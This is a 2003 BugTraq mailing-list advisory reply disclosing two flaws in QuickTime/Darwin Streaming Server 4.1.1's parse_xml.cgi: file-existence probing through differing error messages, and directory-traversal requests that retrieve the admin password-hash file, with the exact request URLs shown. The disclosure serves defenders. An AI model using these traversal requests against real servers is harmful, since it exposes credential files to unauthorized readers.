BugTraq
Re: QuickTime/Darwin Streaming Administration Server Multiple vulnerabilities Feb 28 2003 07:21PM
Joe Testa (Joe_Testa rapid7 com)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Word.

I've found two other issues in QuickTime Streaming Server v4.1.1 that
seem to be fixed in the newest v4.1.3:

1.) File probing:

Request: http://localhost:1220/parse_xml.cgi?filename=../nonexistent
Response: 'Can't access HTML file '../nonexistent'!' [...]

Request: http://localhost:1220/parse_xml.cgi?
filename=../../../autoexec.bat
Response: 'Can't open HTML file '../../../autoexec.bat'! [...]

As you can see, this discrepency in the error message allows an
unauthenticated user to "feel-out" the file system and determine what
structures and files exist.

2.) File retrieval:

Request: http://localhost:1220/parse_xml.cgi?filename=.../qtusers
Response: "realm Streaming Server admin:$dufr$D9/.....$C4g2VaRK" [...]

This works against the Win32 platform, and not against the Linux
platform; this was not tested against Solaris or MacOS X.

Word.

- Joe Testa, Rapid 7, Inc.
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x02B00839
A145 B158 2CA7 00A2 BAE8 4A18 57E5 18E0 02B0 0839

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v6.6.6 (X)

iD8DBQE+X7N/V+UY4AKwCDkRApNaAJkBIiCYmP705zL3wt2tIoR7j2XbowCfeSmf
OmiDhu+FpspKJpToTLZ5zRc=
=Yq4D
-----END PGP SIGNATURE-----

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus